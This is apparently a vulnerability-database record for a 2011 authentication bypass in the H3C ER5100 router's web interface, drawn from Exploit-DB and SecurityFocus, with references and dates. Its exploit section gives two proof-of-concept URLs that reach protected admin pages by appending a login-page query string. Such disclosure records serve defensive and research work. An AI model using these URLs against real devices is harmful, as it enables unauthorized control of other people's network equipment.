ID
VAR-E-201106-0424
EDB ID
35872
TITLE
H3C ER5100 - Authentication Bypass - ASP webapps Exploit
Trust: 0.6
DESCRIPTION
H3C ER5100 - Authentication Bypass.. webapps exploit for ASP platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | h3c | model: | er5100 | scope: | - | version: | - | Trust: 1.0 |
vendor: | 3com | model: | h3c er5100 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48384/info
The H3C ER5100 is prone to a remote authentication-bypass vulnerability.
Attackers can exploit this issue to bypass the authentication mechanism and perform unauthorized actions.
http://www.example.com:8080/home.asp?userLogin.asp
http://www.example.com:8080/wan_NAT.asp?userLogin.asp
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass
Trust: 1.0
CREDITS
128bit
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 48384 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 35872 | Trust: 1.6 |
db: | EDBNET | id: | 57264 | Trust: 0.6 |
db: | WOOYUN | id: | WOOYUN-2010-02268 | Trust: 0.3 |
REFERENCES
url: | https://www.securityfocus.com/bid/48384/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/35872/ | Trust: 0.6 |
url: | http://www.h3c.com.cn/products___technology/products/ip_network/router/er/er5100/ | Trust: 0.3 |
url: | http://www.wooyun.org/bugs/wooyun-2010-02268 | Trust: 0.3 |
SOURCES
db: | BID | id: | 48384 |
db: | EXPLOIT-DB | id: | 35872 |
db: | EDBNET | id: | 57264 |
LAST UPDATE DATE
2022-07-27T09:59:08.141000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 48384 | date: | 2011-06-22T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 48384 | date: | 2011-06-22T00:00:00 |
db: | EXPLOIT-DB | id: | 35872 | date: | 2011-06-22T00:00:00 |
db: | EDBNET | id: | 57264 | date: | 2011-06-22T00:00:00 |